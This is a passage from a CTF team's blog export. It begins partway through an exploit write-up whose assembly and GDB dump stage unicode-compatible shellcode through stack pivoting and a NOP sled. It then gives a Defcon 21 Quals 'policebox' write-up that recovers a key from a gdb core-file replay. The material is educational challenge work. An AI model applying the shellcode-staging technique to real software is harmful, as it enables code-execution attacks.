<span style="color: #4c4c4c;">push</span><span class="Apple-tab-span" style="color: #4c4c4c; white-space: pre;"> </span><span style="color: #4c4c4c;">%rdx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rax</span><span class="Apple-tab-span" style="font-size: 9pt; line-height: 1.5; white-space: pre;"><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span></span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;"># get address of shellcode</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c;">push</span><span class="Apple-tab-span" style="color: #4c4c4c; white-space: pre;"> </span><span style="color: #4c4c4c;">%rax # push the address of shellcode</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">push</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rsp # push the address of address of shellcode</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rax # set RAX the address of address of shellcode</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c;">add</span><span class="Apple-tab-span" style="color: #4c4c4c; white-space: pre;"> </span><span style="color: #4c4c4c;">%bh, (%rax)</span><span class="Apple-tab-span" style="white-space: pre;"><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span></span><span style="color: #4c4c4c;"># add(increase) shellcode address 0xC3(mmap buffer is page aligned)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rdx</span><span class="Apple-tab-span" style="font-size: 9pt; line-height: 1.5; white-space: pre;"><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span></span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;"># set RDX shellcode + 0xC3</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c;"># insert ret instruction at shellcode+C3</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c;">add</span><span class="Apple-tab-span" style="color: #4c4c4c; white-space: pre;"> </span><span style="color: #4c4c4c;">%bh, (%rdx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c;"># get malloc buffer address to RAX</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; white-space: pre;"> </span><span style="color: #4c4c4c;">%rax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="font-size: 9pt; line-height: 1.5;"><span style="color: #4c4c4c;">%rax</span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"> </span><span style="color: #4c4c4c;"># now RAX has malloc buffer address.</span></span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c;"># set RAX to RSP</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c;">push</span><span class="Apple-tab-span" style="color: #4c4c4c; white-space: pre;"> </span><span style="color: #4c4c4c;">%rax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rsp</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c;"># increase RSP enough to skip the unicode shellcode part. and push RSP to stack.</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; white-space: pre;"> </span><span style="color: #4c4c4c;">%rcx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rcx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rcx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rcx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rcx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rcx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rcx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rcx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rcx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rcx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rcx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rcx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rcx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">push</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rsp</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c;"># set RAX a valid address for unicode shell NOP sled.</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c;">push</span><span class="Apple-tab-span" style="color: #4c4c4c; white-space: pre;"> </span><span style="color: #4c4c4c;">%rbp</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">pop</span><span class="Apple-tab-span" style="color: #4c4c4c; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;">%rax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: #4c4c4c; font-size: 9pt; line-height: 1.5;"># everything set. wait for return!!</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
we extracted the machine codes with GDB</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">Dump of assembler code for function main:</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x0000000000401110 <+0>:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">35 00 20 00 20</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">xor $0x20002000,%eax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x0000000000401120 <+16>:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">00 6d 00</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ch,0x0(%rbp)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x0000000000401115 <+5>:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">2d 00 30 00 30</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">sub $0x30003000,%eax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x0000000000401120 <+16>:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">00 6d 00</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ch,0x0(%rbp)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x000000000040111a <+10>:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">35 00 33 00 33</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">xor $0x33003300,%eax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x0000000000401120 <+16>:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">00 6d 00</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ch,0x0(%rbp)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x000000000040111f <+15>:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">50</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">push %rax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x0000000000401120 <+16>:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">00 6d 00</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ch,0x0(%rbp)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x0000000000401123 <+19>:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">5b</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">pop %rbx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x0000000000401124 <+20>:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">00 6d 00</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ch,0x0(%rbp)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x0000000000401127 <+23>:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">52</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">push %rdx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x0000000000401128 <+24>:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">00 6d 00</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ch,0x0(%rbp)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x000000000040112b <+27>:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">58</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">pop %rax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x000000000040112c <+28>:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">00 6d 00</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ch,0x0(%rbp)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x000000000040112f <+31>:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">50</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">push %rax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
...</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-size: 9pt; line-height: 1.5;">this is final exploit.</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px; text-align: center;">
<img class="txc-image" height="539" id="tx_entry_77297_" src="http://cfile28.uf.tistory.com/image/2653C04F51C0031B3724FC" width="769" /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
after doing some debugging, it was successful.</div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
<img class="txc-image" height="115" id="tx_entry_32839_" src="http://cfile1.uf.tistory.com/image/26019A4151C1AEE814762C" width="478" /></div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
Team. Alternativeshttp://www.blogger.com/profile/03054700226316250467noreply@blogger.com1tag:blogger.com,1999:blog-4623132413662310810.post-1070099197880820152013-06-18T22:47:00.000-07:002013-06-18T22:47:39.298-07:00Defcon 21 CTF Quals - policebox writeupTwo files are given below,<br />
<br />
policebox: ELF 32-bit LSB executables, Intel 80386<br />
core: ELF 32-bit LSB core file Intel 80386<br />
<br />
and the core file contains a record.<br />
<br />
with gdb, a simple solution can be derived as follows:<br />
<br />
<br />
zemisolsol@ubuntu:~$ gdb ./policebox -q<br />
Reading symbols from /home/zemisolsol/policebox...(no debugging symbols found)...done.<br />
(gdb) record restore core<br />
[New LWP 17170]<br />
warning: .dynamic section for "/lib/i386-linux-gnu/libc.so.6" is not at the expected address (wrong library or version mismatch?)<br />
warning: .dynamic section for "/lib/ld-linux.so.2" is not at the expected address (wrong library or version mismatch?)<br />
Core was generated by `policebox'.<br />
#0 0x08048621 in main ()<br />
Restored records from core file /home/zemisolsol/core.<br />
#0 0x08048621 in main ()<br />
(gdb) b *main+123<br />
Breakpoint 1 at 0x8048699<br />
(gdb) disp/x $eax<br />
1: /x $eax = 0x1<br />
(gdb) c<br />
Continuing.<br />
<br />
Breakpoint 1, 0x08048699 in main ()<br />
1: /x $eax = <b>0x77</b><br />
(gdb) c<br />
Continuing.<br />
<br />
Breakpoint 1, 0x08048699 in main ()<br />
1: /x $eax = <b>0x30</b><br />
(gdb) c<br />
Continuing.<br />
<br />
Breakpoint 1, 0x08048699 in main ()<br />
1: /x $eax = <b>0x72</b><br />
(gdb)<br />
<div>
<br /></div>
<div>
<div>
<div>
Breakpoint 1, 0x08048699 in main ()</div>
<div>
1: /x $eax = <b>0x6c</b></div>
<div>
(gdb)</div>
<div>
Continuing.</div>
<div>
<br /></div>
<div>
Breakpoint 1, 0x08048699 in main ()</div>
<div>
1: /x $eax = <b>0x64</b></div>
<div>
(gdb)</div>
<div>
Continuing.</div>
<div>
<br /></div>
<div>
Breakpoint 1, 0x08048699 in main ()</div>
<div>
1: /x $eax = <b>0x73</b></div>
<div>
(gdb)</div>
<div>
Continuing.</div>
</div>
</div>
<div>
.</div>
<div>
.</div>
<div>
.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
So, the key is "w0rlds.w0rst.k3yl0gger!"</div>
<div>
<br /></div>
Team. Alternativeshttp://www.blogger.com/profile/03054700226316250467noreply@blogger.com1